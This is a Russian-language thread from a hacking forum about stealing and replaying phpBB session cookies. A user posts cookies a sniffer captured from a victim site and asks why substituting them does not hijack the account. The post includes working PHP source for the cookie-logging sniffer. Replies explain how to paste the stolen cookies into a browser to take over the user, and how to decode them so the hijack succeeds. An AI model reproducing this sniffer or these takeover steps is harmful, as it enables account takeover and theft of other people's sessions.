• XSS.stack #1 – первый литературный журнал от юзеров форума

Тоже кукисы

Отслеживать

sensei

CD-диск
Пользователь
Регистрация
20.10.2006
Сообщения
16
Реакции
0
Не имеет ничего общего с предыдущим постом.
На сниффер приходят кукисы phpbb такого вида:

XXX.XXX.XXX.XXX :: 10/29/2006 2:11:57 pm
http://www.somesite.com/viewtopic.php?t=3018 :: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:33:\"135299834245448bd2da53f2.11437518\";s:6:\"userid\";i:1665;};
phpbb2mysql_sid=c48b0f998efb91018a4467b2cfd95c3a; phpbb2mysql_t=a:1:{i:3018;i:1162120272;}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}

В значении autologinid присутствует точка. Нужна развернутая информация о ее происхождении и функциональности. При замене в кукисах autologinid и userid не происходит смена пользователя (грешу на точку).
 
С одних сайтов ставит точку, с других нет, так что сниффер вне подозрений.
Исходный код сниффера (ничего лишнего, исправьте если ошибаюсь):

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
 
sensei
а в чем проблемы то, в опере в кукезы втсавляешь

phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:33:\"135299834245448bd2da53f2.11437518\";s:6:\"userid\";i:1665;}

и

phpbb2mysql_sid=c48b0f998efb91018a4467b2cfd95c3a

Нажимаешь обновить и ты уже на этом юзаре.
 
во-первых, кукисы хранятся в urlencoded-виде, а снифак их сохраняет уже раскодированными. Во вторых, сделай кукисам в снифере stripslashes(), чтобы убрать лишние слеши. Скорее всего, эти два фактора и несут за собой проблему
 
2 Great: можно чуточку поподробнее про urlencoded и возможные пути решения.
2 Darksideneo: не работает ни в каком виде, в том числе с точкой.

Еще отличительная черта - несколько первых чисел в дестичном формате, затем в шестнадцатеричном, после точки опять десятичный.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх